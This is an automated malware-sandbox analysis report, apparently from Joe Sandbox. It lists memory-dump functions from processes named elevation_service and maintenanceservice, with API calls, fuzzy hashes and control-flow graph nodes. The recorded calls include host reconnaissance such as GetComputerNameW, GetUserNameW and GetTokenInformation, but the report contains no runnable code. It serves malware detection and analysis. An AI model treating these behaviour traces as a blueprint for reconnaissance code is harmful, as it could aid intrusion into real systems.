• Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: 6481628bd4199b2a9b78a87b4116708f0299d0a78705dbf8fde1743bdb7ac037
• Instruction ID: 820222321a8fb7be1bf18c5d9104dcb612de316d0240b30276a60470c33cb129
• Opcode Fuzzy Hash: 6481628bd4199b2a9b78a87b4116708f0299d0a78705dbf8fde1743bdb7ac037
• Instruction Fuzzy Hash: 9E51282070D3898FCF2E7B685C596353BE4FB52714B2E01ABE087C7192DA598C05A3DB

Control-flow Graph
• Function at 0x895b42; graph nodes call CreateThread (graph rendering not reproduced in text)
Memory Dump Source
• Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 091d7d921b4bd51d6447df8909f7bc09ad4070bea333eb4c4650e03260bfcc13
• Instruction ID: 1f1fc768003e860bc5e49baf3f34d606b7aa48b54c72954de25b69e839a95820
• Opcode Fuzzy Hash: 091d7d921b4bd51d6447df8909f7bc09ad4070bea333eb4c4650e03260bfcc13
• Instruction Fuzzy Hash: DE21AC3020DF498FCFABBB28C8587746AE1FB5532CF6C05A69047CF2A6CA248C449356

Control-flow Graph
• Function at 0x8994ab; graph nodes call SetFilePointerEx (twice) and VirtualFree (graph rendering not reproduced in text)
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNELBASE ref: 008994B6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                      • Opcode ID: 0632bc79e136ee572d992be1ae0400c1ca55a9311295f46386f488bd51c3682c
                                                                                                                                                                      • Instruction ID: 52059b8d115f542e6cf886321f23ca524013b76e5158e33bc59a1c1c742028b2
                                                                                                                                                                      • Opcode Fuzzy Hash: 0632bc79e136ee572d992be1ae0400c1ca55a9311295f46386f488bd51c3682c
                                                                                                                                                                      • Instruction Fuzzy Hash: C011C42062DB88AFDF69AE3C441537A76D2F79A314F1C456ED0CFC3161DA258C058702

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      [Control-flow graph figure (legend: Executed / Not Executed) for the function starting at 895b09; basic blocks call CreateThread; graph edge data not reproduced]
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                      • Instruction ID: bb57c58341d69bf9b7931122a7abe8f11cf541355909bfcae94595946a5fef62
                                                                                                                                                                      • Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                      • Instruction Fuzzy Hash: 6C01803010EF4E8FDFA776249C182797790FB5133CF2D01AA8487CA0D5DB644905A712

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      [Control-flow graph figure (legend: Executed / Not Executed) for the function starting at 89893f; basic blocks call SetFilePointerEx; graph edge data not reproduced]
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 2c124238f25e20e1280168f06d8cdfd02d12cd4cdfd6c6e275a3e5effbad6204
                                                                                                                                                                      • Instruction ID: c92558c6b62720d6e4f96673fae9eedad7ccd4ff916272f21ebb05ee5ac04b27
                                                                                                                                                                      • Opcode Fuzzy Hash: 2c124238f25e20e1280168f06d8cdfd02d12cd4cdfd6c6e275a3e5effbad6204
                                                                                                                                                                      • Instruction Fuzzy Hash: 55018F3061D64BDFDF787B58945863ABBA0FB97364F2D060EC8AAC6195CF358C019642

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      [Control-flow graph figure (legend: Executed / Not Executed) for the function starting at 89a5b9; basic blocks call SetFilePointerEx; graph edge data not reproduced]
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNELBASE ref: 0089A5C0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                      • Opcode ID: 676bef793c65ca7a3a2905c46ea0cdf499b25737fa985dc8724dd67d4e827931
                                                                                                                                                                      • Instruction ID: 7b6b87c8f845618614820090fad9f4706ae86f53b002c3142e2b3e96c9af305a
                                                                                                                                                                      • Opcode Fuzzy Hash: 676bef793c65ca7a3a2905c46ea0cdf499b25737fa985dc8724dd67d4e827931
                                                                                                                                                                      • Instruction Fuzzy Hash: 9301812060D7898FDF2F7A7049581793FA4FD2271472E1097D482C7093E998DC4587EB

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      [Control-flow graph figure (legend: Executed / Not Executed) for the function starting at 89a697; basic blocks call ReadFile; graph edge data not reproduced]
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                      • Opcode ID: 1c644a7444de99faaf9beb18aa41b1298ace3a3379acb547bdc547acb6170779
                                                                                                                                                                      • Instruction ID: 1d349b0657004fe38bc9a984210d40a22e2cb28e1f69f5dfc5a137dc3ac0421b
                                                                                                                                                                      • Opcode Fuzzy Hash: 1c644a7444de99faaf9beb18aa41b1298ace3a3379acb547bdc547acb6170779
                                                                                                                                                                      • Instruction Fuzzy Hash: C6E09205B0C2465AEE2971280812F3A2D71F761718F2E016B92AAC10D3E839CC05A283

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      [Control-flow graph figure (legend: Executed / Not Executed) for the function starting at 89a6fe; basic blocks call SetFilePointerEx; graph edge data not reproduced]
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNELBASE ref: 0089A6B2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                      • Opcode ID: 4ea0f9c9bdbe6e5546db613517cf81bba5d0f193e3916aaffede43411c7aebb2
                                                                                                                                                                      • Instruction ID: c6f4c98942b8f7abb21fe9ec6d0966c774d9d982489de3fe3a120049e92ada28
                                                                                                                                                                      • Opcode Fuzzy Hash: 4ea0f9c9bdbe6e5546db613517cf81bba5d0f193e3916aaffede43411c7aebb2
                                                                                                                                                                      • Instruction Fuzzy Hash: EEE04F3421DA0DBF8E7DBFA8D4C203573F0F65475833D4A1A84D7C6504DA29E881A6D3

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      [Control-flow graph figure (legend: Executed / Not Executed) for the function starting at 895b87; basic blocks call CreateThread; graph edge data not reproduced]
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                                                      • Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                      • Instruction ID: 92eeed506218591947deb2788b9174a7c3b880090bf3a39faffa5ea594402def
                                                                                                                                                                      • Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                      • Instruction Fuzzy Hash: DBE0863060DB4C4FDF5BAB2498103193AE5FB89324F1D01CEC44AD71D1CB6909058792
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2738559852-0
APIs
Memory Dump Source
• Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
APIs
• SetFilePointerEx.KERNELBASE ref: 0089A6B2
Memory Dump Source
• Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
APIs
• SetFilePointerEx.KERNELBASE ref: 0089901C
Memory Dump Source
• Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
APIs
• SetFilePointerEx.KERNELBASE ref: 00898DAD
Memory Dump Source
• Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
APIs
Memory Dump Source
• Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
APIs
Memory Dump Source
• Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
Similarity
• API ID: wcscpy
• String ID:
• API String ID: 1284135714-0
APIs
Memory Dump Source
• Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
APIs
Memory Dump Source
• Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0

Execution Graph

Execution Coverage: 3.9%
Dynamic/Decrypted Code Coverage: 97.4%
Signature Coverage: 0%
Total number of Nodes: 77
Total number of Limit Nodes: 6

Control-flow Graph

APIs
• GetSystemDefaultLangID.KERNELBASE ref: 00D153C4
Memory Dump Source
• Source File: 00000013.00000002.1418833358.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_d10000_maintenanceservice.jbxd
Similarity
• API ID: DefaultLangSystem
• String ID:
• API String ID: 706401283-0

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      control_flow_graph 0 d30080-d30286 2 d30099-d30575 0->2 3 d3028c 0->3 7 d30155 2->7 8 d3057b 2->8 5 d30445 3->5 5->2 6 d3044b-d30457 5->6 11 d30458-d30472 GetComputerNameW 6->11 10 d302ef-d30495 call d1e050 * 2 7->10 8->7 9 d30581-d30587 8->9 12 d3058b 9->12 10->11 55 d3043e 10->55 18 d303ee-d303f4 11->18 19 d3024c-d30253 11->19 16 d30181 VirtualFree 12->16 17 d3058c-d30591 12->17 25 d301a8-d302ac call d47164 16->25 20 d30597 17->20 21 d304ab-d304af 17->21 33 d300da-d3023f 18->33 34 d303fa 18->34 22 d301e6 19->22 23 d30255 19->23 20->21 26 d3059d 20->26 46 d304c7 21->46 30 d302b1-d302be 22->30 31 d301ec-d30313 call d4715c 22->31 27 d302d3 23->27 25->30 26->21 27->22 42 d302d9 27->42 39 d302c4 30->39 40 d303bf-d303d9 GetUserNameW 30->40 52 d30318-d3031e 31->52 33->19 50 d30241-d3024a 33->50 34->33 43 d30400 34->43 39->40 48 d302ca 39->48 49 d30331 40->49 42->10 51 d3b1ee-d3b49f 43->51 58 d304cc-d304e6 call d49970 GetComputerNameW 46->58 48->27 53 d30171 49->53 54 d30337 49->54 50->19 50->30 56 d30324 52->56 57 d30568-d3056b 52->57 59 d30173 53->59 60 d3013f-d30146 53->60 54->53 61 d3033d 54->61 55->5 56->57 63 d3032a 56->63 57->58 70 d30131 58->70 71 d304ec-d30514 58->71 65 d30230 59->65 60->12 66 d305d0-d305d9 61->66 63->49 65->46 68 d30236-d305c2 65->68 66->51 68->46 74 d305c8-d305c9 68->74 72 d30137 70->72 73 d30089-d3008c 70->73 71->57 72->73 75 d3013d 72->75 73->25 77 d30092 73->77 74->66 75->16 75->60 77->25 78 d30098 77->78 78->2
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.1418833358.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_d10000_maintenanceservice.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ComputerName
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3545744682-0
                                                                                                                                                                      • Opcode ID: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
                                                                                                                                                                      • Instruction ID: a9023ec146798f81d6280289a4ddc59252cc69d9d4d76a2b68926ee7b6c12d8d
                                                                                                                                                                      • Opcode Fuzzy Hash: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
                                                                                                                                                                      • Instruction Fuzzy Hash: 0FD11332418F0D8BCB68EF58D8557EABBE1FBA0310F18461FD886C7164DA74DA458BD2

                                                                                                                                                                      Control-flow Graph

control_flow_graph 79 d18070-d1817e 81 d18180 79->81 82 d1813d-d181a5 79->82 83 d18184 81->83 84 d1815f 81->84 96 d181a7 82->96 97 d181bd-d181ca 82->97 85 d18186 CloseHandle 83->85 86 d1818c-d18192 83->86 84->82 88 d18161 84->88 85->86 90 d18115-d18118 86->90 91 d18194 86->91 89 d18163-d18170 call d47164 88->89 89->85 102 d18172 89->102 94 d180a7 90->94 95 d18119-d1811a 90->95 91->90 98 d1819a 91->98 95->94 101 d1811c 95->101 105 d181d0 97->105 106 d180f3 97->106 99 d1813c 98->99 99->83 103 d1820f 101->103 102->86 107 d18215-d1821e 103->107 108 d1808e-d18096 103->108 115 d180c3 105->115 116 d181fe-d18201 GetTokenInformation 105->116 109 d180f5 106->109 110 d1808c 106->110 107->108 118 d18224 107->118 108->83 108->94 109->110 117 d18077 109->117 110->108 115->116 121 d180c9 115->121 116->103 130 d181b7 116->130 119 d181d7-d181de call d4715c 117->119 118->119 120 d18226 118->120 128 d181e3-d181e6 119->128 120->119 123 d18228-d182ee call d15d90 120->123 126 d180ca-d180d8 GetTokenInformation 121->126 145 d182f0 123->145 146 d1830c-d1831e 123->146 129 d1810f 126->129 128->126 144 d18089 128->144 131 d18111 129->131 132 d1812d 129->132 130->103 135 d181b9-d181bb 130->135 131->132 137 d18113 131->137 139 d18133 132->139 140 d180a8 132->140 135->97 137->90 139->99 143 d181ed-d181f0 139->143 142 d180aa-d180ad 140->142 142->89 147 d180b3-d18203 142->147 148 d181f6 143->148 149 d180da-d180f1 143->149 144->126 150 d1808b 144->150 145->146 151 d182f2 145->151 154 d182a1-d182ba call d15d90 call d1ec00 146->154 155 d18320 146->155 147->89 158 d18209 147->158 148->149 153 d181fc 148->153 149->142 150->110 156 d182f7-d182fc call d15d90 151->156 153->116 154->155 155->156 160 d18322 155->160 169 d18253-d18265 call d31280 156->169 170 d18302 156->170 160->156 163 d18324-d18326 160->163 164 d18328 163->164 174 d18335 164->174 175 d182df-d1832b 164->175 169->164 182 d1826b 169->182 170->169 173 d18308-d1830a 170->173 173->146 176 d1826e-d18285 174->176 175->174 179 d1832d-d18331 175->179 180 d18287 176->180 181 d1829b-d1829d 176->181 179->174 183 d1824c 180->183 181->154 182->176 184 d18239 182->184 183->181 185 d1824e-d18252 183->185 184->164 186 d1823f-d18243 184->186 185->176 186->156 186->183
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.1418833358.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_d10000_maintenanceservice.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
                                                                                                                                                                      • Instruction ID: e1a45aac2afc7136ac56e80e0c0b67bf01bca030fafe5c3004ddbb7bdfc51fbb
                                                                                                                                                                      • Opcode Fuzzy Hash: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
                                                                                                                                                                      • Instruction Fuzzy Hash: 9161D431A0CB89BFC766CB28B8142F56AA0FB59350F5C0656E496C31A0DF348CC5B376

                                                                                                                                                                      Control-flow Graph

control_flow_graph 187 d15910-d15912 188 d15950-d15968 187->188 189 d15915-d15928 call d49970 187->189 188->189 190 d1596a 188->190 195 d159b8 call d30df0 189->195 193 d15970-d1597b 190->193 194 d1592f 190->194 197 d159d4 193->197 198 d1597d 193->198 194->189 196 d15931-d2072c 194->196 204 d159bd-d159c2 call d15d90 195->204 206 d20732-d20738 196->206 207 d20806-d20809 196->207 201 d159d8 197->201 202 d1593b-d15a15 call d311a0 197->202 198->197 203 d1597f-d15981 198->203 210 d159d9-d159de call d42190 201->210 208 d15983-d15a38 203->208 216 d159c7-d159ce 204->216 213 d20800 206->213 214 d2073e 206->214 220 d2079d-d207a6 207->220 221 d15994-d1599c 208->221 222 d15a3e 208->222 210->221 241 d159e0 210->241 213->207 219 d206b3-d206b7 213->219 214->213 223 d20744-d20774 214->223 230 d159d0 216->230 231 d15a1a-d15a26 216->231 219->220 227 d206bd 219->227 228 d20791-d20793 220->228 229 d207a8 220->229 225 d15a02 221->225 226 d1599e-d159f7 221->226 233 d15a2c-d15a34 222->233 234 d206d5-d206d9 223->234 235 d2077a-d2081c 223->235 225->193 226->225 227->220 237 d206c3-d207fe 227->237 238 d207ca-d207cc 228->238 229->228 239 d207aa 229->239 230->231 240 d159d2-d159de 230->240 231->233 242 d159a1-d159b5 call d15e10 231->242 233->210 246 d206db 234->246 247 d206df 234->247 235->220 237->213 239->238 240->221 240->241 241->221 248 d159e2-d159ec 241->248 242->195 255 d15a08-d15a0b 242->255 246->247 250 d206dd 246->250 247->220 253 d15a62-d15a6e 248->253 254 d159ee-d159ef 248->254 250->247 256 d2c0cc 250->256 257 d15a70 253->257 258 d15a75-d15ab3 call d31280 253->258 254->208 259 d159f1 254->259 255->221 262 d15a0d 255->262 263 d2c0e8-d2c102 256->263 264 d2c0ce-d2c0d0 256->264 257->258 260 d15a72 257->260 277 d15ab5 258->277 278 d15abb-d15ac9 258->278 259->189 260->258 270 d15991 262->270 271 d15932 262->271 265 d2c0d2-d2c0df 263->265 266 d2c104 263->266 264->265 273 d2c0e7 265->273 266->265 266->273 270->271 275 d15993 270->275 275->221 277->278 279 d15ab7-d15ab9 277->279 280 d15af2-d15af5 278->280 279->278 284 d15ad5 280->284 285 d15adb-d15adc 280->285 284->285 286 d15ad7-d15ad9 284->286 287 d15ae2 285->287 288 d15a45-d15a46 285->288 286->285 287->288 289 d15ae8 287->289 289->280
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.1418833358.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_d10000_maintenanceservice.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                                                                                                                                                      • Instruction ID: aef6b1c78a2fbcfdce190f84e779add133a5b2bdda092f92053a4324ee1a7821
                                                                                                                                                                      • Opcode Fuzzy Hash: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                                                                                                                                                      • Instruction Fuzzy Hash: 15F14A2171CE588FC769A71C78513BAB7D2EBD9310F5C419EE08AC3297DD289C4687B2

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      control_flow_graph 332 d15b42-d15b47 call d15d90 334 d15b4c-d15b52 332->334 336 d15c42-d15c62 call d31280 334->336 337 d15b0d 334->337 355 d15c14-d15cc0 336->355 356 d15c26 336->356 337->336 339 d15b13 337->339 340 d15c8f-d15c96 339->340 342 d15c29 340->342 343 d15c98-d15c9a 340->343 346 d15cc2-d15cc9 call d152a0 342->346 347 d15c2f-d15c36 342->347 345 d15c9c 343->345 353 d15bfa 345->353 354 d15d0e-d15d18 345->354 357 d15c69 346->357 358 d15ccb 346->358 347->346 351 d15c3c 347->351 351->332 353->354 359 d15c00 353->359 360 d15d54 354->360 361 d15d1a 354->361 355->346 356->355 363 d15c28 356->363 365 d15b68-d15d75 357->365 366 d15c6f 357->366 358->345 364 d15ccd 358->364 359->355 367 d15d4b-d15d52 361->367 363->342 364->345 368 d15ccf-d15ce4 CreateThread 364->368 366->365 370 d15c75 366->370 367->360 371 d15d45-d15d47 367->371 375 d15c01-d15c05 368->375 376 d15cea 368->376 370->340 372 d15d49 371->372 373 d15d5f 371->373 372->367 372->373 379 d15d65 373->379 380 d15c20-d15c68 375->380 383 d15d37-d15d41 375->383 376->375 378 d15cf0-d15cf6 376->378 378->380 379->379 383->367 384 d15d43 383->384 384->360
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.1418833358.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_d10000_maintenanceservice.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                                                                                                                                                      • Instruction ID: 4c86106278348862c253c82fe5af4d018df292bc93bde574725a398c8256bd08
                                                                                                                                                                      • Opcode Fuzzy Hash: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                                                                                                                                                      • Instruction Fuzzy Hash: 2F216B2020CF45EFCB699E18B4487F567A2ABD5310F5C02A69487CE19ECE2CCCC493B6

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      control_flow_graph 385 d15b09-d15d01 390 d15bb4-d15ce4 CreateThread 385->390 391 d15d07 385->391 395 d15c01-d15c05 390->395 396 d15cea 390->396 391->390 392 d15d0d 391->392 399 d15c20-d15c68 395->399 402 d15d37-d15d41 395->402 396->395 398 d15cf0-d15cf6 396->398 398->399 403 d15d43 402->403 404 d15d4b-d15d52 402->404 406 d15d54 403->406 405 d15d45-d15d47 404->405 404->406 407 d15d49 405->407 408 d15d5f 405->408 407->404 407->408 409 d15d65 408->409 409->409
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.1418833358.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_d10000_maintenanceservice.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                      • Instruction ID: adfa04914670cdd434a225d1710552de40b2667f27f97ca9f460e2a4ab5ce86c
                                                                                                                                                                      • Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                      • Instruction Fuzzy Hash: 5201C43010DF46EFDB555A24BD143F667A1ABD0324F69019B84C7CA09DDEAC89C0A7B2

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      control_flow_graph 410 d15b87-d15d01 CreateThread 414 d15bb4-d15ce4 CreateThread 410->414 415 d15d07 410->415 419 d15c01-d15c05 414->419 420 d15cea 414->420 415->414 416 d15d0d 415->416 423 d15c20-d15c68 419->423 426 d15d37-d15d41 419->426 420->419 422 d15cf0-d15cf6 420->422 422->423 427 d15d43 426->427 428 d15d4b-d15d52 426->428 430 d15d54 427->430 429 d15d45-d15d47 428->429 428->430 431 d15d49 429->431 432 d15d5f 429->432 431->428 431->432 433 d15d65 432->433 433->433
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.1418833358.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_d10000_maintenanceservice.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                                                      • Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                      • Instruction ID: 430362f4f6dc23adf0083e34db8a3a64cf7dbf1b49a56b9c5cf8517180237c42
                                                                                                                                                                      • Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                      • Instruction Fuzzy Hash: 60E04F2060DB449FDB599B24B9103593AA5ABC8314F19018AC48AD7199CF7D494547A2

                                                                                                                                                                      Control-flow Graph

